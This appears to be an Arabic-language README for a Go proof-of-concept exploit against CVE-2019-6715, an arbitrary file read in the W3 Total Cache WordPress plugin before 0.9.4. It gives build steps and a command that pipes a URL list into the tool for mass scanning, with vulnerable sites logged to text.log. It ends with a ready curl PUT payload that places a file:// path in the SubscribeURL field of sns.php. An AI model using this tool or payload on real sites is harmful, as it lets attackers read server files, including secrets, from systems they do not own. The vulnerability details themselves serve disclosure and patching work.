
PoC exploit for CVE-2019-6715: قراءة ملف تعسفية في إضافة W3 Total Cache لووردبريس عبر JSON مخصص لـ SubscriptionConfirmation. يقرأ الملفات من الخوادم الضعيفة باستخدام قائمة عناوين URL مرسلة عبر أنبوب.
go get github.com/fatih/color
go build
cat list.txt | ./2019-6715
جميع عناوين URL الثغرات مسجلة في text.log
الوصف: يسمح ملف pub/sns.php في إضافة W3 Total Cache قبل الإصدار 0.9.4 لووردبريس للمهاجمين عن بُعد بقراءة ملفات عشوائية عبر حقل SubscribeURL في بيانات JSON الخاصة بـ SubscriptionConfirmation.
نوع الثغرة: قراءة ملف عشوائي
بائع المنتج: إضافة Wordpress W3 Total Cache من Frederick Townes
قاعدة كود المنتج المتأثر: W3 Total Cache - 0.9.2.6 - 0.9.3، تم إصلاحه في 0.9.4
المكون المتأثر: ملف المصدر المتأثر: w3-total-cache/pub/sns.php
curl -X PUT --data '{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"file://file_path"}' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36' http://victim.com/wp-content/plugins/w3-total-cache/pub/sns.php